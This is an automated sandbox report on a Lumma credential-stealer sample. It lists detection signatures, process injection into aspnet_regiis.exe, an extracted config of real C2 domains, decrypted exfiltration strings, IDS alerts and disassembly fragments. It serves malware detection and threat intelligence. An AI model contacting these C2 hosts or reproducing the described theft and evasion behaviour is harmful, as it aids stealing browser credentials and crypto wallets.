Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ReploidReplic.exe

Overview

General Information

Sample name:ReploidReplic.exe
Analysis ID:1582548
MD5:7db52dda50a584c20d69a00d2b13c63d
SHA1:12ed1950ad08b2e0dea8442d95b33e03de68ca8d
SHA256:0b571a24307780dc181fd657ee4a9d4fca6a4b2076636d793d906944e3a71e2e
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ReploidReplic.exe (PID: 2312 cmdline: "C:\Users\user\Desktop\ReploidReplic.exe" MD5: 7DB52DDA50A584C20D69A00D2B13C63D)
    • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 2492 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 6732 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tirepublicerj.shop", "ingreem-eilish.biz", "noisycuttej.shop", "wholersorie.shop", "cloudewahsj.shop", "nearycrepso.shop", "rabidcowse.shop", "framekgirus.shop", "abruptyopsn.shop"], "Build id": "HpOoIh--73f82eed6521"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: ReploidReplic.exe PID: 2312JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: aspnet_regiis.exe PID: 2492JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: aspnet_regiis.exe PID: 2492JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: aspnet_regiis.exe PID: 2492JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T21:09:05.263405+010020283713Unknown Traffic192.168.2.449730104.21.48.1443TCP
                2024-12-30T21:09:06.446062+010020283713Unknown Traffic192.168.2.449731104.21.48.1443TCP
                2024-12-30T21:09:07.725901+010020283713Unknown Traffic192.168.2.449733104.21.48.1443TCP
                2024-12-30T21:09:10.474876+010020283713Unknown Traffic192.168.2.449738104.21.48.1443TCP
                2024-12-30T21:09:11.745125+010020283713Unknown Traffic192.168.2.449740104.21.48.1443TCP
                2024-12-30T21:09:13.309211+010020283713Unknown Traffic192.168.2.449742104.21.48.1443TCP
                2024-12-30T21:09:14.157571+010020283713Unknown Traffic192.168.2.449744104.21.48.1443TCP
                2024-12-30T21:09:15.787491+010020283713Unknown Traffic192.168.2.449746104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T21:09:05.918183+010020546531A Network Trojan was detected192.168.2.449730104.21.48.1443TCP
                2024-12-30T21:09:06.943164+010020546531A Network Trojan was detected192.168.2.449731104.21.48.1443TCP
                2024-12-30T21:09:16.303469+010020546531A Network Trojan was detected192.168.2.449746104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T21:09:05.918183+010020498361A Network Trojan was detected192.168.2.449730104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T21:09:06.943164+010020498121A Network Trojan was detected192.168.2.449731104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T21:09:13.619577+010020480941Malware Command and Control Activity Detected192.168.2.449742104.21.48.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://abruptyopsn.shop/apilAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/api3LAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/apiAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/YAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/QAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop:443/apiAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/sAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/apiF9Avira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/Avira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/apiHP2Avira URL Cloud: Label: malware
                Source: 2.2.aspnet_regiis.exe.8a0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "ingreem-eilish.biz", "noisycuttej.shop", "wholersorie.shop", "cloudewahsj.shop", "nearycrepso.shop", "rabidcowse.shop", "framekgirus.shop", "abruptyopsn.shop"], "Build id": "HpOoIh--73f82eed6521"}
                Source: C:\Users\user\AppData\Roaming\gdi32.dllReversingLabs: Detection: 68%
                Source: ReploidReplic.exeReversingLabs: Detection: 60%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
                Source: ReploidReplic.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: cloudewahsj.shop
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: rabidcowse.shop
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: noisycuttej.shop
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: tirepublicerj.shop
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: framekgirus.shop
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: wholersorie.shop
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: abruptyopsn.shop
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: nearycrepso.shop
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: ingreem-eilish.biz
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmpString decryptor: HpOoIh--73f82eed6521
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B9362 CryptUnprotectData,2_2_008B9362
                Source: ReploidReplic.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: ReploidReplic.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbo source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: %%.pdb source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER1976.tmp.dmp.5.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WER1976.tmp.dmp.5.dr
                Source: Binary string: n0C:\Windows\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Desktop\ReploidReplic.PDB source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER1976.tmp.dmp.5.dr
                Source: Binary string: \??\C:\Users\user\Desktop\ReploidReplic.PDBB source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb\ source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb/ source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 4x nop then mov ecx, eax0_2_0083B800
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]0_2_0085CC30
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]0_2_00827E40
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]0_2_00827E40
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]0_2_00835840
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_008235E0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]0_2_00848730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]2_2_008C6000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]2_2_008AC22D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h2_2_008DFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp], ecx2_2_008B9362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah2_2_008E0480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]2_2_008DDCE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_008DDCE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_008CBE8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]2_2_008CBE8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [esi], dl2_2_008ADE48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, edx2_2_008A8640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]2_2_008B5882
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h2_2_008B5882
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h2_2_008D98A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh2_2_008D90A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], dl2_2_008CC0CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]2_2_008DF0CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp ecx2_2_008DD818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h2_2_008B9820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_008B9820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]2_2_008DF830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h2_2_008CA050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]2_2_008DE051
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]2_2_008DE850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_008DE19A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], dl2_2_008CC1A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]2_2_008DC1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]2_2_008C6360
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_008C6360
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]2_2_008DF1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp ecx2_2_008C29CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_008C29CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_008AB9F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_008C8100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h2_2_008E0130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh2_2_008B6148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]2_2_008B6148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [esi], al2_2_008B6148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [esi], al2_2_008B6148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], dl2_2_008CC140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edi], cx2_2_008C895A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_008C895A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, word ptr [eax]2_2_008C4974
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h2_2_008C4974
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]2_2_008DEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_008CC282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]2_2_008CC282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_008C9A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]2_2_008DF2F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_008CC26C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]2_2_008CC26C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edi], ax2_2_008BCA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edi], ax2_2_008BCA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]2_2_008C3A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]2_2_008DE262
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [esi], al2_2_008CBA79
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax], dl2_2_008C238D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp ecx2_2_008C238D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]2_2_008BC3CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]2_2_008A73C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]2_2_008A73C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]2_2_008DF3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then test eax, eax2_2_008D93D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push esi2_2_008C0BD3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]2_2_008DF330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_008C6340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]2_2_008C6340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]2_2_008A2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]2_2_008C6360
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_008C6360
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]2_2_008C1C80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]2_2_008B6C90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h2_2_008C74A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]2_2_008C7CB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_008C7CB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_008D5410
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, eax2_2_008DC440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]2_2_008DF450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]2_2_008D9C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_008BAD80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]2_2_008B4DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]2_2_008B55DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]2_2_008B6C90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, ecx2_2_008DC510
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then test eax, eax2_2_008DC510
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h2_2_008DC510
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, eax2_2_008BBD6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebp+00h], al2_2_008BDE90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ecx], bp2_2_008BCECA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx]2_2_008DE6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]2_2_008AC6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_008A8EF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h2_2_008DFE20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [esi], al2_2_008B6F8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_008B6F8D
